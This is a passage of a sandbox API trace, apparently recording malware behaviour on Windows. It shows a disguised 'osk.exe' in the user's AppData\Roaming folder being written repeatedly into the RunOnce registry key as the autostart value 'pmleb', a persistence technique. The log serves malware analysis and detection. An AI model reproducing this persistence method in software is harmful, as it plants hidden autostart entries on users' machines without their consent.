[0082.633] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0082.639] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0082.639] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0082.639] KillTimer (hWnd=0x20280, uIDEvent=0x20fc) returned 1 [0082.639] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0082.639] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0082.639] IUnknown:Release (This=0x787518) returned 0x1 [0082.639] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, 
[7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0082.639] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0082.639] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0082.640] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0082.640] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0082.640] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0082.640] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, 
riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0082.640] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0082.640] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0082.640] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x81 [0082.640] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0082.640] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x82 [0082.640] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), 
pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0082.641] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x81 [0082.641] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f0c0 | out: ppv=0x33f0c0*=0x787518) returned 0x0 [0082.649] IUnknown:Release (This=0x787518) returned 0x1 [0082.649] GetTickCount () returned 0x114aae0 [0082.649] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0082.649] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0082.649] IUnknown:Release (This=0x7a9740) returned 0x1 [0082.649] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0082.649] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0082.649] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0082.649] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0082.649] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0082.649] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0082.649] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: 
phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0082.649] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0082.649] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0082.650] RegCloseKey (hKey=0x280) returned 0x0 [0082.650] IUnknown:Release (This=0x7a9740) returned 0x1 [0082.650] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0082.650] SetTimer (hWnd=0x20280, nIDEvent=0x20fd, uElapse=0xa, lpTimerFunc=0x0) returned 0x20fd [0082.650] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0082.654] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0082.654] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0082.654] KillTimer (hWnd=0x20280, uIDEvent=0x20fd) returned 1 [0082.655] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0082.657] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0082.657] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0082.657] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0082.657] RegCloseKey (hKey=0x280) returned 0x0 [0082.657] IUnknown:Release (This=0x7a9740) returned 0x1 [0082.658] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0082.658] SetTimer (hWnd=0x20280, nIDEvent=0x20fe, uElapse=0xa, lpTimerFunc=0x0) returned 0x20fe 
[0082.658] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0082.670] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0082.670] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0082.670] KillTimer (hWnd=0x20280, uIDEvent=0x20fe) returned 1 [0082.670] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0082.671] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0082.671] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0082.671] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0082.671] RegCloseKey (hKey=0x280) returned 0x0 [0082.671] IUnknown:Release (This=0x7a9740) returned 0x1 [0082.671] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0082.672] SetTimer (hWnd=0x20280, nIDEvent=0x20ff, uElapse=0xa, lpTimerFunc=0x0) returned 0x20ff [0082.672] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0082.686] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0082.686] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0082.686] KillTimer (hWnd=0x20280, uIDEvent=0x20ff) returned 1 [0082.687] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0082.687] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0082.687] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: 
phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0082.687] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0082.688] RegCloseKey (hKey=0x280) returned 0x0 [0082.688] IUnknown:Release (This=0x7a9740) returned 0x1 [0082.688] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0082.688] SetTimer (hWnd=0x20280, nIDEvent=0x2100, uElapse=0xa, lpTimerFunc=0x0) returned 0x2100 [0082.688] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0082.701] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0082.701] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0082.701] KillTimer (hWnd=0x20280, uIDEvent=0x2100) returned 1 [0082.702] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0082.702] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0082.702] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0082.702] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0082.702] RegCloseKey (hKey=0x280) returned 0x0 [0082.703] IUnknown:Release (This=0x7a9740) returned 0x1 [0082.703] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0082.703] SetTimer (hWnd=0x20280, nIDEvent=0x2101, uElapse=0xa, lpTimerFunc=0x0) returned 0x2101 [0082.703] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: 
lpMsg=0x33f7fc) returned 1 [0082.717] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0082.717] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0082.717] KillTimer (hWnd=0x20280, uIDEvent=0x2101) returned 1 [0082.717] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0082.718] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0082.718] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0082.718] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0082.718] RegCloseKey (hKey=0x280) returned 0x0 [0082.718] IUnknown:Release (This=0x7a9740) returned 0x1 [0082.718] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0082.718] SetTimer (hWnd=0x20280, nIDEvent=0x2102, uElapse=0xa, lpTimerFunc=0x0) returned 0x2102 [0082.718] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0082.732] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0082.732] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0082.732] KillTimer (hWnd=0x20280, uIDEvent=0x2102) returned 1 [0082.733] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0082.733] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0082.733] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0082.733] RegSetValueExA (in: 
hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0082.734] RegCloseKey (hKey=0x280) returned 0x0 [0082.734] IUnknown:Release (This=0x7a9740) returned 0x1 [0082.734] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0082.734] SetTimer (hWnd=0x20280, nIDEvent=0x2103, uElapse=0xa, lpTimerFunc=0x0) returned 0x2103 [0082.734] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0082.748] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0082.748] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0082.749] KillTimer (hWnd=0x20280, uIDEvent=0x2103) returned 1 [0082.749] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0082.749] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0082.749] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0082.750] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0082.750] RegCloseKey (hKey=0x280) returned 0x0 [0082.750] IUnknown:Release (This=0x7a9740) returned 0x1 [0082.750] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0082.750] SetTimer (hWnd=0x20280, nIDEvent=0x2104, uElapse=0xa, lpTimerFunc=0x0) returned 0x2104 [0082.750] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0082.763] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0082.763] 
DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0082.764] KillTimer (hWnd=0x20280, uIDEvent=0x2104) returned 1 [0082.764] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0082.764] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0082.764] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0082.765] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0082.765] RegCloseKey (hKey=0x280) returned 0x0 [0082.765] IUnknown:Release (This=0x7a9740) returned 0x1 [0082.765] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0082.765] SetTimer (hWnd=0x20280, nIDEvent=0x2105, uElapse=0xa, lpTimerFunc=0x0) returned 0x2105 [0082.765] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0082.779] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0082.779] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0082.779] KillTimer (hWnd=0x20280, uIDEvent=0x2105) returned 1 [0082.780] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0082.780] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0082.780] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0082.780] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0082.780] RegCloseKey (hKey=0x280) returned 0x0 [0082.780] IUnknown:Release (This=0x7a9740) returned 0x1 [0082.781] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0082.781] SetTimer (hWnd=0x20280, nIDEvent=0x2106, uElapse=0xa, lpTimerFunc=0x0) returned 0x2106 [0082.781] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0082.796] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0082.796] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0082.796] KillTimer (hWnd=0x20280, uIDEvent=0x2106) returned 1 [0082.796] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0082.797] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0082.797] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0082.797] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0082.797] RegCloseKey (hKey=0x280) returned 0x0 [0082.797] IUnknown:Release (This=0x7a9740) returned 0x1 [0082.797] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0082.797] SetTimer (hWnd=0x20280, nIDEvent=0x2107, uElapse=0xa, lpTimerFunc=0x0) returned 0x2107 [0082.797] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0082.810] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0082.810] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0082.810] KillTimer (hWnd=0x20280, 
uIDEvent=0x2107) returned 1 [0082.811] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0082.811] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0082.811] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0082.811] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0082.812] RegCloseKey (hKey=0x280) returned 0x0 [0082.812] IUnknown:Release (This=0x7a9740) returned 0x1 [0082.812] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0082.812] SetTimer (hWnd=0x20280, nIDEvent=0x2108, uElapse=0xa, lpTimerFunc=0x0) returned 0x2108 [0082.812] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0082.826] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0082.826] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0082.826] KillTimer (hWnd=0x20280, uIDEvent=0x2108) returned 1 [0082.827] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0082.827] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0082.827] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0082.827] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0082.827] RegCloseKey (hKey=0x280) returned 0x0 [0082.827] IUnknown:Release (This=0x7a9740) returned 0x1 [0082.828] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0082.828] SetTimer (hWnd=0x20280, nIDEvent=0x2109, uElapse=0xa, lpTimerFunc=0x0) returned 0x2109 [0082.828] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0082.841] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0082.841] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0082.842] KillTimer (hWnd=0x20280, uIDEvent=0x2109) returned 1 [0082.842] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0082.842] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0082.842] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, 